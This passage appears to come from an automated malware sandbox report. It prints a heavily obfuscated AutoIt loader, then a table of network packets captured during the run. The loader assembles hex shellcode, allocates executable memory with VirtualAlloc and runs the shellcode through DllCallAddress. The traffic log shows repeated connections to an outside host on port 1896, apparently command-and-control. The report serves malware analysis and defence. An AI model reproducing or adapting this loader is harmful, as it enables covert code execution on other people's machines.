(87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $197553472 = 684192185 CASE 684192185 $O33393833KPWTZB &= $O353SY ("87sihc5c5ujxolbm11x5d5dxkhaveg" ) $197553472 = 1892817007 CASE 694144588 $O33393833KPWTZB &= $V39NUX ("B837hh1yDhh1yE4hh1y0hh1y074hh1y1053FFhh1y75E4hh1yFFhh1y95hh1y7hh1y0FFFFhh1yFFFFhh1y7hh1y5Ehh1y4FF55hh1yE0hh1y83hh1y7DE800hh1y74hh1y0hh1y6hh1yFFhh1y7hh1y5hh1yEhh1y8FFhh1y5hh1y5hh1yEhh1y0hh1y8hh1y5Fhh1yF7hh1y4hh1y0hh1yAhh1y6hh1y800" , "hh1y" , "" ) $197553472 = 1597403880 CASE 698963862 $O33393833KPWTZB &= $Z37IB8K ("0x4430333030303033334330363633393536303430463934433033443443303130303030304638343239303330303030384434354534353038443835413846454646464635303532353236413034353235323532" ) $197553472 = 706251512 CASE 706251512 $O33393833KPWTZB &= $Z37IB8K ("0x464637353043464637353038464635353834383543303046383443353032303030303844383544434642464646463530464637354538464635353830383543303046383442303032303030303333433035303641303438" ) $197553472 = 554725439 CASE 754347554 $O33393833KPWTZB &= $O32313337QJ6Z6A $197553472 = 2049571787 CASE 807257674 LOCAL $J32383034OP = $B32343933BHRMQ ($V3135P3 ("8fw18mxqfpmhjwppkernel32yn0vki5c61puh2bslvfrz2i4owhx" , 17 + 3782 + 4294963514 , 8 + 3782 + 4294963514 ) , $O353SY ("n6uj6l2a8fdb82i1" ) , $V39NUX ("Vitwxu11rtwxu11ttwxu11uatwxu11lAtwxu11ltwxu11loc" , "twxu11" , "" ) , $O353SY ("wsfw2ol5d5njl8h8p4depjqxw0fu" ) , 0 , $O353SY ("wasxt0b4ze638posik6j0tppb5vwn5" ) , $J323534391M ($O33393833KPWTZB ) , $O353SY ("uv7ly83bb" ) , $V39NUX ("0x30bf8fw6n0bf8fw6n0" , "bf8fw6n" , "" ) , $V3135P3 ("wzkvlsygitsmhsqbitf46g1rmqmdwordfbjp2nsjvyfccovfwbyr2ef7512k" , 28 + 4294958191 + 9105 , 5 + 4294958191 + 9105 ) , B38ZPPGU ("868432-868504-868436-868432-" , 868384 ) ) EXITLOOP CASE 854553390 $O33393833KPWTZB &= $D313630358SP $197553472 = 1296483263 CASE 947431475 $O33393833KPWTZB &= $V3135P3 ("68168y3kczf4jajbw5mnqn5ngs0zt775EB33C0EB038B46185F5E5DC20400558BEC81bp2rgz3khz51ldjf4xu" , 30 + 4294961161 + 6135 , 39 + 4294961161 + 6135 ) $197553472 = 961348210 CASE 961348210 $O33393833KPWTZB &= $O353SY ("x4aib2xbmf5tqjhk4l8h7pol" ) $197553472 = 540021528 CASE 1023162799 $O33393833KPWTZB &= $U3131F51ZD ("s0rnk8fm0nkz61r46f0jqetgy70FFFFFF898508FFFFFF8D458089850CFFFFFF8D8578FFFFFF898510FFFFFF8D857CFF" , 25 + 4294964314 + 2982 ) $197553472 = 247051243 CASE 1065523592 $O33393833KPWTZB &= $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87348 ) ) $197553472 = 694144588 CASE 1107033673 $O33393833KPWTZB &= $U3131F51ZD ("g6znlupzfjwplkdg480FF75E4FF55DC8945FC85C00F84FD010000FF7654FF751057FF55C433C93" , 18 + 134 * 1 + 4294967162 ) $197553472 = 1507971141 CASE 1119677627 $O33393833KPWTZB &= $I31330D6 ("FF8BF88D458850E819FFFFFF8BD8C78528FFFFFF793A3C0g48ahgue1e4a71" , 14 + 7632 + 4294959664 ) $197553472 = 1497642837 CASE 1170832963 $O33393833KPWTZB &= $Z37IB8K ("0x354636413333363638393435384335383641333236363839343539343538364132453541364136343636" ) $197553472 = 424398338 CASE 1178081240 LOCAL $O33393833KPWTZB = $Z31353236VY423T $197553472 = 317041254 CASE 1189059638 $O33393833KPWTZB &= $R313631310M $197553472 = 947431475 CASE 1191090362 $O33393833KPWTZB &= $U32333039GGK6 $197553472 = 1322325458 CASE 1296483263 $O33393833KPWTZB &= $O353SY ("wnn8k5e2q58ckt1nf" ) $197553472 = 1336094009 CASE 1322325458 $O33393833KPWTZB &= $B32333930C0N $197553472 = 1065523592 CASE 1336094009 $O33393833KPWTZB &= $O353SY ("mpgi338pxqjq5t" ) $197553472 = 1189059638 CASE 1344125600 $O33393833KPWTZB &= $O353SY ("z2m4o6cm3yybzpozilxjmq" ) $197553472 = 1023162799 CASE 1497642837 $O33393833KPWTZB &= $V39NUX ("7jkszv88Djkszv845jkszv8Cjkszv84jkszv8C7jkszv885jkszv82jkszv8CFFFjkszv8Fjkszv8FFjkszv879jkszv84Ajkszv88jkszv8Ajkszv80jkszv8B8jkszv89jkszv885Ejkszv8Cjkszv8FEjkszv8Fjkszv8FFjkszv8Fjkszv88D4jkszv85D8898jkszv85jkszv8F0jkszv8Fjkszv8EFjkszv8Fjkszv8Fjkszv8Fjkszv88jkszv8D4jkszv85jkszv8Bjkszv888jkszv89jkszv88jkszv85jkszv8" , "jkszv8" , "" ) $197553472 = 1953304794 CASE 1507971141 $O33393833KPWTZB &= $V39NUX ("3C3vofsj0893vofsj4D3vofsjF3vofsj43vofsj63vofsj63vofsj3B3vofsj43vofsj6063vofsj73vofsj32E83vofsjB5D3vofsjC3vofsj83vofsj83vofsj33vofsjC3vofsj32C033vofsjDEF3vofsjF3vofsj733vofsjFC3vofsj8B0303vofsj343vofsj53vofsj10508B3vofsj43vofsj3F83vofsj033vofsjC3vofsj73vofsj50FF3vofsj53vofsj5C3vofsj43vofsj8B43vofsjDF48D53vofsj" , "3vofsj" , "" ) $197553472 = 31564936 CASE 1537586385 $O33393833KPWTZB &= $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) $197553472 = 1119677627 CASE 1566911474 $O33393833KPWTZB &= $V39NUX ("08D8pc1y5pc1yDpc1yCFBpc1yFFpc1yFpc1yFpc1yC7pc1y8pc1y5pc1yA8FEFpc1yFpc1yFF4400pc1y0pc1y0pc1y0050pc1yFF5pc1y5pc1yDpc1y8pc1y8pc1yBpc1y4D1pc1y03pc1y3pc1yD2pc1y" , "pc1y" , "" ) $197553472 = 511805355 CASE 1588307237 $O33393833KPWTZB &= $I31330D6 ("B4DF483E80841D1E8894DF43BC872BF8B4DF8034A040352043B8BA40000006A00894DF859729833DB53FFzhjsfri6q7pjng1ln3z6brmkdx7kih" , 30 + 4294965051 + 2245 ) $197553472 = 122734813 CASE 1597403880 $O33393833KPWTZB &= $Z37IB8K ("0x3830303030303533353746463535433038423835363446464646464638334638303530463836323046434646464633334330354635453542384245353544433230433030" ) $197553472 = 807257674 CASE 1629206375 $O33393833KPWTZB &= $L31393938EKFWEI $197553472 = 1940172472 CASE 1657267227 $O33393833KPWTZB &= $J313639321UOGL $197553472 = 128580426 CASE 1662106412 $O33393833KPWTZB &= $S31363938ET5K $197553472 = 1344125600 CASE 1728161007 $O33393833KPWTZB &= $Y31363930YK $197553472 = 1657267227 CASE 1739397950 $O33393833KPWTZB &= $I31330D6 ("50885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F5E5B8BEp4i2ikctkrcpuanuvn8f8" , 21 + 4294965780 + 1516 ) $197553472 = 268691428 CASE 1892817007 $O33393833KPWTZB &= $I31330D6 ("300000FF7650FF7634FF75E4FF55DC8945FC85C0754185DB7518FF7634FF75E4FF55B86A406800300000FF7650pa7hsunalkluwsg8qbg0l6gth5ed" , 28 + 4705 * 1 + 4294962591 ) $197553472 = 1969900180 CASE 1923293943 $O33393833KPWTZB &= $M323232301JA03B $197553472 = 67217268 CASE 1940172472 $O33393833KPWTZB &= $Z37IB8K ("0x42444138393535463833334330383935354434363633393131304639344330334434443541303030303046383434463033303030303333433033393136304639344330334435303435303030303046383433" ) $197553472 = 698963862 CASE 1953304794 $O33393833KPWTZB &= $O353SY ("u527utigfe3d3pa84x6ao" ) $197553472 = 1728161007 CASE 1969900180 $O33393833KPWTZB &= $O353SY ("q28wr6jf2lywptgl1h8tatqz" ) $197553472 = 1107033673 CASE 2049571787 $O33393833KPWTZB &= $V3135P3 ("je8vggetl36gn2wo2zucre6yi974248B463481E1FF0F0000030A2904398B45F40FB74C42088B433481E1FF0F0000030A0104398B42048gsc7q213kxujwag6dputk52" , 26 + 9424 * 2 + 4294948448 , 84 + 9424 * 2 + 4294948448 ) $197553472 = 1588307237 ENDSWITCH WEND IF NOT @ERROR AND $J32383034OP [0 ] THEN $J32383034OP = $J32383034OP [0 ] ELSE RETURN FALSE ENDIF $338561916 = 1178081240 WHILE 1 SWITCH $338561916 CASE 268691428 $B32343933BHRMQ ($C31KU765 (R37FLO7 (87387 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87330 ) ) , $U3131F51ZD ("ltecfrqptdword" , 9 + 6056 + 4294961240 ) , $Z37IB8K ("0x5669727475616C46726565" ) , $V3135P3 ("zzetxpw8f3au7ldcb1smdworddcvsn03m60be8sz" , 21 + 7395 * 1 + 4294959901 , 5 + 7395 * 1 + 4294959901 ) , $J32383034OP , $V3135P3 ("z3tmmm3ko66cocghf86wghnqe2h5dword6mfl7cc2f8" , 29 + 9129 * 4 + 4294930780 , 5 + 9129 * 4 + 4294930780 ) , 0 , $U3131F51ZD ("32rdli38qrn6mmg5bvzdword" , 19 + 4251 * 3 + 4294954543 ) , $O353SY ("2hg22lfktrnnxpyvagkmqvr" ) ) EXITLOOP CASE 274725409 $S32353233CD7VP0 ($C323830364EJ , $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87392 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87381 ) ) , $B3237393221GL ) $338561916 = 1739397950 CASE 317041254 LOCAL $C323830364EJ = $R323439367DKWBU ($N32333934XZLN & $B32343333SKG ($B3237393221GL ) & "]" ) $338561916 = 326133898 CASE 326133898 $S32353233CD7VP0 ($W32383035JOWY , $Z32333936EJ , $O33393833KPWTZB ) $338561916 = 274725409 CASE 1178081240 LOCAL $W32383035JOWY = $R323439367DKWBU ($Z37IB8K ("0x62797465207368656C6C636F64655B" ) & $J323534391M ($O33393833KPWTZB ) & "]" , $J32383034OP ) $338561916 = 317041254 CASE 1739397950 LOCAL $S32383033JPB = DLLCALLADDRESS ($V39NUX ("dfveyvn7wfveyvn7ofveyvn7rdfveyvn7" , "fveyvn7" , "" ) , $J32383034OP + $W323430361TZ2 , $O353SY ("nrxu5jurku5bkjha" ) , $R32373931PJ , $Z37IB8K ("0x77737472" ) , $F33393831BDEU , $Y323431328Z0R , $B32353137WR7K ($C323830364EJ ) ) $338561916 = 268691428 ENDSWITCH WEND IF NOT @ERROR AND $S32383033JPB [0 ] THEN RETURN $S32383033JPB [0 ] ELSE RETURN FALSE ENDIF ENDFUNC FUNC R37FLO7 ($K34353330SGUNI0 ) RETURN $K34353330SGUNI0 + 4294880016 ENDFUNC FUNC B38ZPPGU ($D34353332Y4OSXV , $L34353333OW06AX ) $274725409 = 1178081240 WHILE 1 SWITCH $274725409 CASE 317041254 LOCAL $K34353335IVCV2 $274725409 = 326133898 CASE 326133898 $K34353335IVCV2 = STRINGSPLIT ($D34353332Y4OSXV , "-" ) EXITLOOP CASE 1178081240 LOCAL $Y34353334ME = "" $274725409 = 317041254 ENDSWITCH WEND FOR $S343533386Z = 1 TO $K34353335IVCV2 [0 ] + 4294967295 STEP 1 $Y34353334ME &= $C31KU765 ($K34353335IVCV2 [$S343533386Z ] - $L34353333OW06AX ) NEXT RETURN $Y34353334ME ENDFUNC

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Apr 8, 2021 10:32:02.460150003 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460298061 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460338116 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460366011 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460393906 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460416079 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460423946 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460441113 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460452080 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.460473061 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.473345041 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473376036 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473421097 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473447084 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473468065 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473483086 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473501921 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473521948 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473537922 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473552942 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473836899 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473862886 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473879099 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.473982096 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.474093914 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474113941 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474200964 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474268913 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:02.474302053 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474323988 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474462032 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474528074 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.474951982 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.532011032 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:02.532248974 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566365957 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566577911 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566723108 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566778898 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566826105 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566858053 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566884041 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.566976070 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.578700066 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.579906940 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.579945087 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.579972029 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580003977 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580066919 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580084085 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.580096006 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580122948 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580147028 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580409050 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580708981 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.580739021 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.581065893 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.581094027 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.581249952 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.581338882 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.581374884 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:07.656950951 CEST44349680204.79.197.200192.168.2.7
        Apr 8, 2021 10:32:07.657120943 CEST49680443192.168.2.7204.79.197.200
        Apr 8, 2021 10:32:16.947623014 CEST496951896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:17.343370914 CEST189649695192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:17.344871998 CEST496951896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:17.414465904 CEST496951896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:17.826581001 CEST189649695192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:22.056134939 CEST496981896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:22.301279068 CEST189649698192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:22.301584959 CEST496981896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:22.318511009 CEST496981896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:22.785805941 CEST189649698192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:26.835517883 CEST497001896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:27.036284924 CEST189649700192.169.69.26192.168.2.7
        Apr 8, 2021 10:32:27.036422968 CEST497001896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:27.037098885 CEST497001896192.168.2.7192.169.69.26
        Apr 8, 2021 10:32:27.528179884 CEST189649700192.169.69.26192.168.2.7
